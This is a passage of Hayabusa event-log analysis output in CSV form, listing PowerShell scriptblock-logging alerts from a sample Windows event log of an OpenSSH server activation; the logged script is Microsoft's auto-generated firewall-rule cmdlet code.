$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter)",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParame,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParame,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,ter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} 